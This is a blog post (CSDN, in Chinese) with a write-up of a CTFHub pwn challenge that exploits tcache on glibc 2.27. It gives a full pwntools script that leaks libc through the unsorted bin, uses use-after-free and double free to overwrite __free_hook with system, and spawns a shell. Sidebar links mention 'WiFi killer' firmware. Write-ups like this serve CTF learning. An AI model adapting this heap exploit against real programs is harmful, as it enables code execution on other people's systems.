[CTFHub]-技能树----pwn tcache Attack

最新推荐文章于 2023-02-09 13:56:08 发布
最新推荐文章于 2023-02-09 13:56:08 发布
阅读量195 收藏
点赞数
分类专栏: PWN 网络安全 文章标签: python linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/128857374
版权

目前只有我一人解出来,估计是其他大佬不屑于做这样简单的题吧!
长话短说,做堆类题一定要亲自动手调试!!!调试!!!调试!!!,重要的事情说三遍。

难度

入门级别,很简单

解析

题目给了libc版本,是libc_2.27。
首先先创建7个0x80的chunk,然后把他们free掉,使他们进入tcache bins,然后再创建一个0x80大小的chunk释放掉,使其进入unsorted bins,因为本题free掉chunk后并没有置0,所以纯在UAF和double free。然后可以通过show函数泄露unsorted bins中的地址计算libc基地址,在通过double free漏洞改__free_hooke的值为system的值,最后拿到shell。

标题最终exp

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./chunk1"
io = remote("challenge-c1de9e72dce05941.sandbox.ctfhub.com",28689)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27_64.so")

def add(idx,size,data):
	io.recvuntil(b"Your choice: ")
	io.sendline(b"1")
	io.recvuntil(b"Give me a book ID: ")
	io.sendline(str(idx))
	io.recvuntil(b"how long: ")
	io.sendline(str(size))
	io.recvuntil(b"Content: ")
	io.send(data)

def show(idx):
	io.recvuntil(b"Your choice: ")
	io.sendline(b"2")
	io.recvuntil(b"Which book do you want to show?")
	io.sendline(str(idx))
	

def free(idx):
	io.recvuntil(b"Your choice: ")
	io.sendline(b"3")
	io.recvuntil(b"Which one to throw?")
	io.sendline(str(idx))

for i in range(7):
	add(i,0x80,b"aaaa")

add(7,0x80,b"aaaa")
add(8,0x90,b"/bin/sh\x00")
for i in range(8):
	free(i)

show(7)
io.recvuntil(b"Content: ")
libc_addr = u64(io.recv(6).ljust(8,b"\x00"))-96-0x10-libc.sym['__malloc_hook']
free_hook = libc_addr+libc.sym['__free_hook']
system_addr = libc_addr+libc.sym['system']
print(b"libc_addr-------------->: ",hex(libc_addr))
print(b"free_hook-------------->:",hex(free_hook))
for i in range(6):
	add(6-i,0x80,b"aaaa")

free(0)
add(0,0x80,p64(free_hook))
add(9,0x80,b"aaaa")
add(10,0x80,p64(system_addr))
free(8)


io.interactive()
saulgoodman-q
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
星盟-pwn-heap2 (tcache attack,house of orange)
qq_65147345的博客
08-08 1218
通过unsorted-bin泄露出libc_base 通过tcache attack申请到malloc_hook的地址 改写为one_gadget
pwn 堆入门之tcache
清霂的博客
05-13 467
目录ciscn_final_3ciscn_2019_es_1 ciscn_final_3 #!/usr/bin/env python3 # coding=utf-8 from pwn import * arch = "amd64" filename = "ciscn_final_3" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) # libc l
linux_pwn(6)--tcache&&double free&&ciscn_2019_final_3
azraelxuemo的博客
03-10 1498
文章目录What is tcachepwn题例题检查代码分析add函数delete函数准备框架attack修改大小为unsorted bin范围free成unsorted bin难点,怎么泄露libcdouble free free_hook总结 What is tcache tcache是libc2.26之后引进的一种新机制,类似于fastbin一样的东西,每条链上最多可以有 7 个 chunk,free的时候当tcache满了才放入fastbin,unsorted bin,malloc的时候优先去tca
LCTF2018 PWN easy_heap学习(以及tcache基础认识)
a2590035252的博客
09-24 414
适合于广大像我一样的pwn爱好者
[CTFHub-技能树]-----House of roman
KaliLinux_V的博客
02-09 160
先利用UAF漏洞,把chunk申请到ptr_size处,修改size的大小,构造堆溢出,利用堆溢出,打unlink,把chunk申请到ptr处,最后篡改**.fini_array**的值,拿到shell。如下图,可以看出来chunk已经申请到size处了,之后伪造size,造成堆溢出。会在程序结束时调用,一般有2个指针,会依次调用,调用完后才会真正退出。这是一道静态编译的题,没有libc库,所以不能用常规的方法来打。之后再利用堆溢出,打unlink,篡改.fini_array。先定义好要用到的地址。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
ctf题库ctf-pwn赛题收集
03-31
此外,CTF题库也提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。在比赛中,参赛者可以学习新的技能,了解新的安全趋势,并结识志同道合的人。此外,CTF比赛也是一种很好的锻炼方式,...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
PWN】Fastbin 与 Tcache 的利用
u014377094的博客
05-03 1105
从本周开始,针对ctfwiki的顺序,整理堆的攻击方式,顺便练一下手。克服惰性与抗拒,才能继续进步。 首先是为何把fastbin和tcache放第一个整理,因为fastbin和tcache是所有后续攻击的基础,为了实现写入“任意”地址,通常情况下都是利用fastbin和tcache,有个明显的原因就是fastbin和tcache都采用单链表结构,结构更加简单,简单也意味着缺少复杂的检测,更加利于我们去利用。其次,为何把它俩放一起,原因还是两者的结构相似,地位相近,但细节上有不同,放在一起对比利用。 再说
好好说话之Tcache Attack(1):tcache基础与tcache poisoning
hollk’s blog
02-01 4101
进入到了Tcache的部分,我还是觉得有必要多写一写基础的东西。以往的各种攻击手法都是假定没有tcache的,从练习二进制漏洞挖掘的角度来看其实我们一直模拟的都是很老的环境,那么这样一来其实和真正的生产环境就产生了较大的差距,这导致了CTF-PWN就是CTF-PWN,除了比赛有用之外让人看不出实际的生产转化。以上均属个人想法,如果你觉得纯理论的东西没什么意思,完全可以跳过这前面部分直接看后面的例题
由一道CTF pwn题深入理解libc2.26中的tcache机制
weixin_30363981的博客
04-20 526
本文首发安全客:https://www.anquanke.com/post/id/104760 在刚结束的HITB-XCTF有一道pwn题gundam使用了2.26版本的libc.因为2.26版本中加入了一些新的机制,自己一开始没有找到利用方式,后来经大佬提醒,才明白2.26版本中新加了一种名叫tcache(thread local caching)的缓存机制。 本文将依据2.26源码探讨tcac...
tcache 利用 part 1
zhangji
12-03 829
tcache makes heap exploitation easy again 0x01 The pwn of CTF Challenge 1 : LCTF2018 PWN easy_heap 题目和官方解答链接 基本信息 远程环境中的 libc 是 libc-2.27.so ,所以堆块申请释放过程中需要考虑 Tcache 。 zj@zj-virtual-machine:~/c_study/l...
BUUCTF-PWN刷题记录-5(Tcache
weixin_44145820的博客
04-13 1324
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
CTF pwn题堆入门 -- Tcache bin
lifanxin的博客
04-06 3926
Tcache attack序言概述攻击方式绕过Tcache分配堆到目的地址tcache poisoningtcache house of spirit总结 序言 无奈于pwn题中与堆相关的东西实在是比较多,加上到了2021年的现在,ctf比赛中一来就是堆题,还都是新版本libc,对我这种新手中的新手实在不太友好,以此写下这个系列文章,记录自己学习堆漏洞利用过程中的点滴,同时也是个总结吧。结合自己做题的理解,将堆攻击常见的手段和方式按照一定的规律记录下来。本文章系列将分成五大块,即tcache attack
glibc2.29堆溢出tcache的利用方式及原理
Hello World.c
03-06 8126
ibc2.29 堆溢出tcache的利用方式及原理 Dancing With Heap 与堆共舞 二进制学习之旅 参考资料: ctf-pwn https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/tcache_attack/#tcache-poisoning glibc wiki https://sourceware.org/glib...
tcache 利用 part2
zhangji
12-05 533
Challenge 2 : HITCON 2018 PWN baby_tcache 题目 题目 exp CTFtime 上提供的 基本信息 远程环境中的 libc 是 libc-2.27.so 和上面的题目一样。 zj@zj-virtual-machine:~/c_study/hitcon2018/pwn1$ checksec ./baby_tcache [*] '/home/zj/c_study...
Pwn Heap With Tcache
weixin_30925411的博客
08-03 213
Pwn Heap With Tcache 前言 glibc 2.26 开始引入了 tcache , 相关的 commit 可以看 这 。加入 tcache 对性能有比较大的提升,不过由于 tcache 的存在 ,一些利用方式的限制条件就少了许多。具体往下看。 相关文件位于 https://gitee.com/hac425/blog_data/tree/master/tcache_pwn 修改自...
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值